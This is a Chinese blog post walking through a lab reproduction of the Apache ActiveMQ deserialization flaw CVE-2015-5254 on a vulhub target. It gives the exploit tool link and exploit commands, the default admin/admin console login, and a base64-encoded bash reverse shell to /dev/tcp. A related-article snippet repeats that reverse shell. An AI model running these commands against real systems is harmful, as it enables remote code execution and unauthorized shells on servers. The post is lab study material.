漏洞复现 - ActiveMQ反序列化漏洞(CVE-2015-5254)

最新推荐文章于 2023-08-19 20:02:50 发布
最新推荐文章于 2023-08-19 20:02:50 发布
阅读量2.7k 收藏 3
点赞数
分类专栏: 漏洞 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/122603741
版权

0x01 前言

--学如逆水行舟,不进则退

0x02 漏洞简介

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

0x03 环境搭建

这里复现的环境使用的vulhub靶场

cd /vulhub-master/activemq/CVE-2015-5254      //进入漏洞目录

docker-compose up -d                     //启动镜像

启动之后,访问ip:8161出现以下图片说明搭建成功 

 0x04 漏洞复现

漏洞利用工具下载地址

https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

使用漏洞利用工具,执行想要执行的命令

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir qwe"

 工具运行之后,访问靶机ip:8161/admin,出现以下页面,默认密码为admin,admin

登录进去之后,再次访问以下路径,会发现新建了一个名为event的队列,并发送了一条消息

靶机ip:8161/admin/browse.jsp?JMSDestination=event,如下图

点击这条信息,即可执行命令,现在来看看命令是否执行

docker ps       //查看正在运行的容器

docker exec -it 容器id bash   //进去容器

 

 发现命令执行成功,创建一个名为qwe的文件夹

接下来反弹shell

反弹shell之前需要把反弹shell的命令进行base63编码,编码地址为:

bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1122 0>&1

 java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

 编码之后,使用漏洞利用工具,进行新建event的队列

命令如下(""之中为base64编码后的反弹shell的命令)

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvMTEyMiAwPiYx}|{base64,-d}|{bash,-i}"

 漏洞利用工具执行之后,还是访问之前那个路径

靶机ip:8161/admin/browse.jsp?JMSDestination=event

访问之后,会发现又新建了一个event的队列,点击之后,会发现反弹shell成功

 0x05 漏洞修复

官网修复补丁

种树人1
关注
专栏目录
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 637
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
[ vulhub漏洞复现篇 ] ActiveMQ反序列化漏洞复现CVE-2015-5254
qq_51577576的博客
08-14 3085
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。......
vulhub学习(1) ActiveMQ反序列化漏洞CVE-2015-5254复现
yukinorong的博客
06-24 1393
漏洞环境 配置vulhub , 在目录activemq/CVE-2015-5254中打开docker。 docker中显示 此时开启了两个端口分别为8161和61616 其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞复现 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现实验报告
weixin_48400575的博客
01-20 2699
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现实验报告
ActiveMQ反序列化漏洞CVE-2015-5254
nz9611的博客
07-16 1719
目标:192.168.199.120:8161 漏洞ActiveMQ反序列化漏洞CVE-2015-5254) 攻击原理:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 攻击步骤: 1.构造可...
01 - vulhub - ActiveMq - CVE-2015-5254
易编橙 · 终身成长社群,相遇已是上上签!
09-18 648
漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
activemq_CVE-2015-5254_漏洞复现_源码分析
qq_51550750的博客
06-03 703
ActiveMQ-CVE-2015-5254
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
漏洞复现】---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 710
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2926
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ反序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7789
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
CVE-2015-5254ActiveMQ 反序列化漏洞复现
p_utao的博客
03-19 445
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
CVE-2015-5254漏洞复现
最新发布
2201_75761617的博客
08-19 337
Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。至此,一个权限为root,密码为123456的用户被我们创建成功,之后可以直接进行ssh远程连接。(1)访问web界面并进行登录。
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
oiadkt的博客
04-14 545
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
vulhub-activemq-cve-2015-5254
Ronin_qianmo的博客
07-27 173
1、漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-2017-7504出现在/j
ActiveMQ反序列化漏洞CVE-2015-5254复现
菲曼巴的博客
11-24 3504
ActiveMQ反序列化漏洞CVE-2015-5254复现详细过程 访问ip:8161/admin 默认密码:admin/admin wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar kali下载工具并使用 mkdir external 创建文件夹否则会报错提示不存在文件夹 bash -i >& /dev/tcp/192.168.186.129/8888 0>
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1503
ActiveMQ 反序列化漏洞
反弹shell
stonesharp的专栏
04-03 3383
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化机制造成的。 攻击者可以构造恶意序列化对象,然后将其发送给 ActiveMQ 服务器。当服务器接收到恶意序列化对象并进行反序列化时,恶意代码就会被执行,从而导致系统受到攻击。 为了防止 ActiveMQ 反序列化漏洞的利用,可以采取以下措施: 1. 更新和升级:及时更新 ActiveMQ 版本,以获取最新的安全修复和漏洞修复。 2. 配置安全策略:通过配置 ActiveMQ安全策略来限制用户对序列化和反序列化的访问权限,只允许信任的类进行反序列化操作。 3. 输入验证和过滤:在接收到消息之前,对用户提交的数据进行严格的输入验证和过滤,确保只接受合法和可信的数据。 4. 序列化过滤:实施白名单机制,只允许特定的类进行反序列化操作,阻止未知类的反序列化。 5. 安全意识培训:加强对开发人员和系统管理员的安全意识培训,提高他们对反序列化漏洞的认识,以及如何正确地使用 ActiveMQ。 请注意,这些建议只是一些通用的防御措施,具体的安全配置和防护措施需要根据实际情况进行调整和实施。建议在使用 ActiveMQ 或其他中间件时,密切关注厂商的安全公告和最佳实践。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值